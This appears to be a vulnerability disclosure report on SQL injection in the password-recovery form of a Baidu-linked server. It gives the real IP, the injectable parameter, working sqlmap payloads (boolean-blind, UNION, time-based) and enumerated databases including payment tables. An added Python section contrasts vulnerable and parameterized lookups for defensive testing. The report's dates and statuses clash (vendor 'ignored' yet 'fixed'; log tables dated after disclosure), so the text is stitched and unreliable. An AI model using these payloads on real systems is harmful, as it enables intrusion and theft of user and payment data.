2014-07-18: Details have been reported to the vendor and are awaiting processing.
2014-07-23: The vendor has actively ignored the vulnerability; details are being disclosed to the public.
Baidu really is fast, and it is just as solid at crunching data. Not bad.
It seems this can only be tested after logging in; the injection is in the password-recovery function. POST:
http://111.13.96.20:80/auth/forgotpwd-two (POST)username=1
sqlmap identified the following injection points with a total of 45 HTTP(s) requests:
---
Place: POST
Parameter: username
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: username=1' AND 6436=6436 AND 'thpJ'='thpJ
    Vector: AND [INFERENCE]

    Type: UNION query
    Title: MySQL UNION query (NULL) - 8 columns
    Payload: username=-3884' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7172766c71,0x4d68646a4a7358587675,0x716b6f6f71),NULL,NULL,NULL,NULL#
    Vector: UNION ALL SELECT NULL,NULL,NULL,[QUERY],NULL,NULL,NULL,NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: username=1' AND SLEEP(5) AND 'HlqX'='HlqX
    Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
web application technology: PHP 5.2.8
back-end DBMS: MySQL 5.0.11
available databases [8]:
[*] information_schema
[*] mcp_pay
[*] mcp_user
[*] mysql
[*] openapi
[*] performance_schema
[*] slow
[*] test

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: username
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: username=1' AND 6436=6436 AND 'thpJ'='thpJ
    Vector: AND [INFERENCE]

    Type: UNION query
    Title: MySQL UNION query (NULL) - 8 columns
    Payload: username=-3884' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7172766c71,0x4d68646a4a7358587675,0x716b6f6f71),NULL,NULL,NULL,NULL#
    Vector: UNION ALL SELECT NULL,NULL,NULL,[QUERY],NULL,NULL,NULL,NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: username=1' AND SLEEP(5) AND 'HlqX'='HlqX
    Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
web application technology: PHP 5.2.8
back-end DBMS: MySQL 5.0.11
Database: mcp_user
[85 tables]
+----------------------------------------------+
| mcp_mt_log_2014-06-09                        |
| mcp_mt_log_2014-06-10                        |
| mcp_mt_log_2014-06-11                        |
| mcp_mt_log_2014-06-12                        |
| mcp_mt_log_2014-06-13                        |
| mcp_mt_log_2014-06-14                        |
| mcp_mt_log_2014-06-15                        |
| mcp_mt_log_2014-06-16                        |
| mcp_mt_log_2014-06-17                        |
| mcp_mt_log_2014-06-18                        |
| mcp_mt_log_2014-06-19                        |
| mcp_mt_log_2014-06-20                        |
| mcp_mt_log_2014-06-21                        |
| mcp_mt_log_2014-06-22                        |
| mcp_mt_log_2014-06-23                        |
| mcp_mt_log_2014-06-24                        |
| mcp_mt_log_2014-06-25                        |
| mcp_mt_log_2014-06-26                        |
| mcp_mt_log_2014-06-27                        |
| mcp_mt_log_2014-06-28                        |
| mcp_mt_log_2014-06-29                        |
| mcp_mt_log_2014-06-30                        |
| mcp_mt_log_2014-07-01                        |
| mcp_mt_log_2014-07-02                        |
| mcp_mt_log_2014-07-03                        |
| mcp_mt_log_2014-07-04                        |
| mcp_mt_log_2014-07-05                        |
| mcp_mt_log_2014-07-06                        |
| mcp_mt_log_2014-07-07                        |
| mcp_mt_log_2014-07-08                        |
| mcp_mt_log_2014-07-09                        |
| mcp_mt_log_2014-07-10                        |
| mcp_mt_log_2014-07-11                        |
| mcp_mt_log_2014-07-12                        |
| mcp_mt_log_2014-07-13                        |
| mcp_mt_log_2014-07-14                        |
| mcp_mt_log_2014-07-15                        |
| mcp_mt_log_2014-07-16                        |
| mcp_mt_log_2014-07-17                        |
| mcp_mt_log_2014-07-18                        |
| mcp_mt_log_2014-07-19                        |
| mcp_mt_log_2014-07-20                        |
| mcp_mt_log_2014-07-21                        |
| mcp_mt_log_2014-07-22                        |
| mcp_mt_log_2014-07-23                        |
| mcp_mt_log_2014-07-24                        |
| mcp_mt_log_2014-07-25                        |
| mcp_mt_log_2014-07-26                        |
| mcp_mt_log_2014-07-27                        |
| mcp_mt_log_2014-07-28                        |
| mcp_mt_log_2014-07-29                        |
| mcp_mt_log_2014-07-30                        |
| mcp_mt_log_2014-07-31                        |
| mcp_mt_log_2014-08-01                        |
| mcp_mt_log_2014-08-02                        |
| mcp_auto_register                            |
| mcp_baidu_visitor                            |
| mcp_feedback_channel                         |
| mcp_feedback_type                            |
| mcp_mo_log                                   |
| mcp_mt_log                                   |
| mcp_sms_code                                 |
| mcp_smscode_type                             |
| mcp_sys_reply                                |
| mcp_user_91                                  |
| mcp_user_baidu                               |
| mcp_user_extension                           |
| mcp_user_feedback                            |
| mcp_user_feedback_dealwith                   |
| mcp_user_fr                                  |
| mcp_user_fr_type                             |
| mcp_user_info                                |
| mcp_user_log_type                            |
| mcp_user_log_typecode                        |
| mcp_user_ori                                 |
| mcp_user_qudao                               |
| mcp_user_third                               |
| mcp_user_uselog                              |
| mcp_user_version                             |
| mcp_visitor_info                             |
| ricktest                                     |
| user_phone_bind                              |
| user_realname_auth                           |
| user_register_type                           |
| yxjd_uid_info                                |
+----------------------------------------------+

Database: performance_schema
[17 tables]
+----------------------------------------------+
| cond_instances                               |
| events_waits_current                         |
| events_waits_history                         |
| events_waits_history_long                    |
| events_waits_summary_by_instance             |
| events_waits_summary_by_thread_by_event_name |
| events_waits_summary_global_by_event_name    |
| file_instances                               |
| file_summary_by_event_name                   |
| file_summary_by_instance                     |
| mutex_instances                              |
| performance_timers                           |
| rwlock_instances                             |
| setup_consumers                              |
| setup_instruments                            |
| setup_timers                                 |
| threads                                      |
+----------------------------------------------+

Database: mcp_pay
[82 tables]
+----------------------------------------------+
| Activity_Info                                |
| Alipay_History                               |
| Alipay_PC_History                            |
| Apexs_history                                |
| BaiFuBao_Recharge_Record                     |
| Baifubao_History                             |
| BeiWei_Mo_Info                               |
| Card_Info                                    |
| Channel_Info                                 |
| Channel_type                                 |
| CreditCard_BindId_Phone                      |
| Duokoo_Account_Info                          |
| Exchange_Rate                                |
| External_Channel_Info                        |
| GPP_log                                      |
| Game_Coorperation_Info                       |
| HuaJian_History                              |
| HuanJian_SingleBook                          |
| Kefu_Operation_Log                           |
| Kongzhong_Get_Mo                             |
| Kuaiqian_Netway_History                      |
| Kubi_Pay_Info                                |
| LianTongWo_YueDu_History                     |
| LianTong_Wo_History                          |
| Liandong_Netway_History                      |
| Mo9_Recharge_History                         |
| Pay_Channel_Info                             |
| Pay_Info                                     |
| Pay_Netway_Info                              |
| Pay_Relation                                 |
| Pay_Type_Info                                |
| Phone_Pay_Info                               |
| Present_Info                                 |
| Present_Strategy_Info                        |
| Product_Type_Info                            |
| RDO_Recharge_History                         |
| Recharge_Card_info                           |
| Recharge_Channel_Info                        |
| Recharge_Info                                |
| Recharge_MM_Phone_Info                       |
| Recharge_NetWay_Submit_Info                  |
| Recharge_Notify_Stat                         |
| Recharge_Phone_info                          |
| Recharge_Type                                |
| ShenZhouFu_History                           |
| ShengFengyj_History                          |
| ShengFengyj_SingleBook                       |
| Singlebook_Record_Info                       |
| SouHu_Unicom_History                         |
| Sub_Channel_Info                             |
| TenPay_History                               |
| TenPay_PC_History                            |
| TianYi_Sms_History                           |
| Timing_Present_Info                          |
| Tyxk_Mo_Info                                 |
| Tyxk_Send_Status                             |
| Tyxk_Subscribe_Info                          |
| Tyxk_Wap_Info                                |
| UMP_Netway_History                           |
| UMP_Netway_History_yx                        |
| UPMP_Recharge_History                        |
| User_Account_Info                            |
| User_Phone_Relation                          |
| YeePay_Credit_History                        |
| Yiao_Netway_History                          |
| Yibao_Bank_History                           |
| YidongMM_History                             |
| YidongMM_Sms_SingleBook                      |
| YidongMM_WAP_History                         |
| Youxijidi_ShortKey                           |
| Youxijidi_Wap_History                        |
| Youxijidi_Wap_History_Yx                     |
| alipay_preceate_res                          |
| hunandianxin_log                             |
| liandong_sms_recharge_yx                     |
| mcp_channel_info                             |
| mcp_cp_info                                  |
| mcp_fr_info                                  |
| mcp_wapgame_type                             |
| qrcode_cp_order                              |
| sinapay_log                                  |
| sms_rechargeinfo_souhu                       |
+----------------------------------------------+

Database: openapi
[40 tables]
+----------------------------------------------+
| GSDK_Alipay_History                          |
| GSDK_HuaJian_History                         |
| GSDK_ShengFeng_History                       |
| GSDK_UMP_Netway_history                      |
| GSDK_card_recharge_history                   |
| Gsdk_CreditCard_BindId_Phone                 |
| Gsdk_PalmCard_BindId_Phone                   |
| Gsdk_PayChannel_Info                         |
| Gsdk_YeePay_Credit_History                   |
| Record_ShengFeng_History_Ex                  |
| Record_Telecom_Pay_History                   |
| Record_Unicom_Pay_History                    |
| ShengFengLTYX_SMS_History                    |
| cp_game_version_info                         |
| cp_order_info                                |
| gamemsgapi_channelprefix                     |
| gsdk_order_info                              |
| gsdk_paypalm_recharge_res_record             |
| gsdk_playgame_online_time                    |
| gsdk_yibao_recharge_history                  |
| ios_order_record                             |
| ios_order_recordbak                          |
| ios_order_recordbak0619                      |
| qpmsg_cp_order_info                          |
| record_MMarket_history                       |
| record_fenghuangshi_history                  |
| record_fenghuangshiapidy_history             |
| record_gamebaseh5_history                    |
| record_kjcx_history                          |
| record_ltsk_sync_history                     |
| record_mdo_history                           |
| record_mo9_history                           |
| record_tcdclt_sync_history                   |
| record_woreadermsg_history                   |
| record_woreadersdk_history                   |
| record_wostoresdk_history                    |
| record_zhongkazhihui_history                 |
| sdk_version_info                             |
| wawa_ftpfile_statics_daily                   |
| wawa_pay_history                             |
+----------------------------------------------+

Database: mysql
[24 tables]
+----------------------------------------------+
| user                                         |
| columns_priv                                 |
| db                                           |
| event                                        |
| func                                         |
| general_log                                  |
| help_category                                |
| help_keyword                                 |
| help_relation                                |
| help_topic                                   |
| host                                         |
| ndb_binlog_index                             |
| plugin                                       |
| proc                                         |
| procs_priv                                   |
| proxies_priv                                 |
| servers                                      |
| slow_log                                     |
| tables_priv                                  |
| time_zone                                    |
| time_zone_leap_second                        |
| time_zone_name                               |
| time_zone_transition                         |
| time_zone_transition_type                    |
+----------------------------------------------+

Database: information_schema
[65 tables]
+----------------------------------------------+
| CHARACTER_SETS                               |
| CLIENT_STATISTICS                            |
| COLLATIONS                                   |
| COLLATION_CHARACTER_SET_APPLICABILITY        |
| COLUMNS                                      |
| COLUMN_PRIVILEGES                            |
| ENGINES                                      |
| EVENTS                                       |
| FILES                                        |
| GLOBAL_STATUS                                |
| GLOBAL_TEMPORARY_TABLES                      |
| GLOBAL_VARIABLES                             |
| INDEX_STATISTICS                             |
| INNODB_BUFFER_PAGE                           |
| INNODB_BUFFER_PAGE_LRU                       |
| INNODB_BUFFER_POOL_PAGES                     |
| INNODB_BUFFER_POOL_PAGES_BLOB                |
| INNODB_BUFFER_POOL_PAGES_INDEX               |
| INNODB_BUFFER_POOL_STATS                     |
| INNODB_CHANGED_PAGES                         |
| INNODB_CMP                                   |
| INNODB_CMPMEM                                |
| INNODB_CMPMEM_RESET                          |
| INNODB_CMP_RESET                             |
| INNODB_INDEX_STATS                           |
| INNODB_LOCKS                                 |
| INNODB_LOCK_WAITS                            |
| INNODB_RSEG                                  |
| INNODB_SYS_COLUMNS                           |
| INNODB_SYS_FIELDS                            |
| INNODB_SYS_FOREIGN                           |
| INNODB_SYS_FOREIGN_COLS                      |
| INNODB_SYS_INDEXES                           |
| INNODB_SYS_STATS                             |
| INNODB_SYS_TABLES                            |
| INNODB_SYS_TABLESTATS                        |
| INNODB_TABLE_STATS                           |
| INNODB_TRX                                   |
| INNODB_UNDO_LOGS                             |
| KEY_COLUMN_USAGE                             |
| PARAMETERS                                   |
| PARTITIONS                                   |
| PLUGINS                                      |
| PROCESSLIST                                  |
| PROFILING                                    |
| QUERY_RESPONSE_TIME                          |
| REFERENTIAL_CONSTRAINTS                      |
| ROUTINES                                     |
| SCHEMATA                                     |
| SCHEMA_PRIVILEGES                            |
| SESSION_STATUS                               |
| SESSION_VARIABLES                            |
| STATISTICS                                   |
| TABLES                                       |
| TABLESPACES                                  |
| TABLE_CONSTRAINTS                            |
| TABLE_PRIVILEGES                             |
| TABLE_STATISTICS                             |
| TEMPORARY_TABLES                             |
| THREAD_STATISTICS                            |
| TRIGGERS                                     |
| USER_PRIVILEGES                              |
| USER_STATISTICS                              |
| VIEWS                                        |
| XTRADB_ADMIN_COMMAND                         |
+----------------------------------------------+
You know what that means.
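To make the defensive point of this report concrete, here is an added example that is not part of the original write-up and not the vendor's code. The real application is PHP 5.2.8 on MySQL (per the sqlmap banner); this is a Python/sqlite3 stand-in for a forgot-password username lookup, showing the string-concatenation pattern that the injection implies next to a parameterized version. The `users` table, the names alice and bob, and the function names are constructed for this example. The `oracle_leaks` check sends one true and one false probe in the same shape as the report's boolean-blind payload (`1' AND 6436=6436 AND 'thpJ'='thpJ`) and reports whether the two responses differ, which is exactly the behaviour blind inference depends on; only the concatenated lookup differs, the bound-parameter lookup treats the whole string as a literal username.

```python
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed sample data: a tiny stand-in for the user table behind a
    password-recovery lookup (schema and rows are assumptions for this example)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, email TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, email) VALUES (?, ?)",
        [("alice", "alice@example.test"), ("bob", "bob@example.test")],
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, username: str) -> list:
    """The pattern the report implies: the POST parameter is spliced into the
    SQL text, so a quote character in it changes the query's structure."""
    sql = "SELECT id, email FROM users WHERE username = '" + username + "'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn: sqlite3.Connection, username: str) -> list:
    """Parameterized lookup: the value is bound separately from the SQL text,
    so the database only ever compares it as a literal string."""
    sql = "SELECT id, email FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()


# Two boolean-blind probes in the shape of the report's payload: one whose
# injected condition is true, one whose condition is false.  Both are
# constructed for this example.
PROBE_TRUE = "alice' AND 1=1 AND 'x'='x"
PROBE_FALSE = "alice' AND 1=2 AND 'x'='x"


def oracle_leaks(lookup) -> bool:
    """True when the true/false probes yield different results, i.e. the
    endpoint behaves as a boolean oracle through which data can be inferred."""
    conn = build_db()
    return lookup(conn, PROBE_TRUE) != lookup(conn, PROBE_FALSE)


if __name__ == "__main__":
    print("concatenated lookup leaks:", oracle_leaks(lookup_vulnerable))  # True
    print("parameterized lookup leaks:", oracle_leaks(lookup_safe))  # False
```

The same true/false probe pair is a cheap regression check to keep in a test suite for any endpoint that takes a username: if the two probes ever produce different responses again, the parameter has been spliced back into a query somewhere.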
Severity: No impact (vendor ignored)
Ignored at: 2014-07-23 18:17
Vulnerability Rank: 10 (WooYun rating)
2014-07-23: Many thanks, the vulnerability has been fixed.